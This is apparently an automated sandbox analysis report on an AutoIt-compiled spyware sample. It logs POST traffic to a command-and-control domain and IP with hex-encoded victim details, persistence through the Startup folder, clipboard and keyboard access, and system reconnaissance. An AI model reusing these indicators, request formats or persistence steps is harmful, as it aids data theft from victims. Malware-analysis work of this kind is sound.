Source: unknownHTTP traffic detected: POST /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 0Content-Length: 17852Content-Type: application/x-www-form-urlencoded
Source: curl.exe, 00000021.00000002.2481616714.0000000003318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/
Source: file.exe, 00000000.00000002.3389486145.0000000001048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/%
Source: curl.exe, 00000011.00000002.2301039187.00000000032A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/--
Source: curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/44
Source: curl.exe, 0000000C.00000002.2275900755.0000000003328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/5iu
Source: curl.exe, 00000019.00000002.2404181964.00000000030D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/7
Source: file.exe, 00000014.00000003.2377965624.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/735C417070446174615C526F616D696E675C4D6963726F736F66745C5
Source: file.exe, 00000000.00000003.2211257605.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2277109701.0000000001176000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/735C4465736B746F705C66696C652E657865
Source: curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/::z
Source: curl.exe, 0000000C.00000002.2275811158.00000000032E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/;
Source: curl.exe, 0000000C.00000002.2275900755.0000000003328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/Bi
Source: curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/E-H
Source: curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/H
Source: curl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/K
Source: curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/T
Source: curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/Ti
Source: curl.exe, 0000001B.00000002.2429620320.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/W
Source: curl.exe, 0000001B.00000002.2429446057.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/bB
Source: curl.exe, 00000021.00000002.2481616714.0000000003318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/c
Source: curl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/cb
Source: curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.2301039187.00000000032A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/cur32.dll
Source: curl.exe, 0000001D.00000003.2454254677.0000000003778000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2454940776.0000000003778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/g_
Source: curl.exe, 0000000C.00000002.2275811158.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001B.00000002.2429446057.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/n64;
Source: curl.exe, 0000001D.00000003.2454254677.0000000003778000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2454940776.0000000003778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peerhost59mj7i6macla65r.com/search/ow-
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49793 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0025EAFF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0025ED6A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,20_2_005BED6A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0025EAFF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0024AA57
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00279576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00279576
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,20_2_005D9576

System Summary

barindex
Source: file.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: file.exe, 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c85f81e1-4
Source: file.exe, 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_18a44242-8
Source: file.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: file.exe, 00000014.00000000.2361713022.0000000000602000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1c18c4a7-7
Source: file.exe, 00000014.00000000.2361713022.0000000000602000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d4df6bea-5
Source: file.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6d2c1950-a
Source: file.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e56a4c9f-7
Source: file.exe.11.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a351ad83-d
Source: file.exe.11.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2763f376-e
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0024D5EB
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00241201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00241201
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0024E8F6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,20_2_005AE8F6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002520460_2_00252046
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E80600_2_001E8060
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002482980_2_00248298
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0021E4FF0_2_0021E4FF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0021676B0_2_0021676B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002748730_2_00274873
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0020CAA00_2_0020CAA0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001ECAF00_2_001ECAF0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001FCC390_2_001FCC39
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00216DD90_2_00216DD9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001FB1190_2_001FB119
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E91C00_2_001E91C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002013940_2_00201394
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002017060_2_00201706
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0020781B0_2_0020781B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E79200_2_001E7920
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001F997D0_2_001F997D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002019B00_2_002019B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00207A4A0_2_00207A4A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00201C770_2_00201C77
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00207CA70_2_00207CA7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026BE440_2_0026BE44
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00219EEE0_2_00219EEE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00201F320_2_00201F32
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001EBF400_2_001EBF40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B204620_2_005B2046
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0054806020_2_00548060
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005A829820_2_005A8298
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0057E4FF20_2_0057E4FF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0057676B20_2_0057676B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005D487320_2_005D4873
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0054CAF020_2_0054CAF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0056CAA020_2_0056CAA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0055CC3920_2_0055CC39
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_00576DD920_2_00576DD9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0055B11920_2_0055B119
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005491C020_2_005491C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0056139420_2_00561394
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0056170620_2_00561706
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0056781B20_2_0056781B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0055997D20_2_0055997D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0054792020_2_00547920
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005619B020_2_005619B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_00567A4A20_2_00567A4A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_00561C7720_2_00561C77
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_00567CA720_2_00567CA7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005CBE4420_2_005CBE44
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_00579EEE20_2_00579EEE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0054BF4020_2_0054BF40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_00561F3220_2_00561F32
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe 5270C4C6881B7D3EBAEA8F51C410BBA8689ACB67C34F20440527A5F15F3BC1E4
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00200A30 appears 46 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 001FF9F2 appears 40 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 001E9CB3 appears 31 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: String function: 00549CB3 appears 31 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: String function: 00560A30 appears 46 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: String function: 0055F9F2 appears 40 times
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: tmp.txt.1.drBinary string: Boot Device: \Device\HarddiskVolume1
Source: classification engineClassification label: mal100.spre.adwa.spyw.evad.winEXE@48/4@1/2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002537B5 GetLastError,FormatMessageW,0_2_002537B5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002410BF AdjustTokenPrivileges,CloseHandle,0_2_002410BF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_002416C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005A10BF AdjustTokenPrivileges,CloseHandle,20_2_005A10BF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,20_2_005A16C3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_002551CD
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0026A67C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0025648E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_001E42A2
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
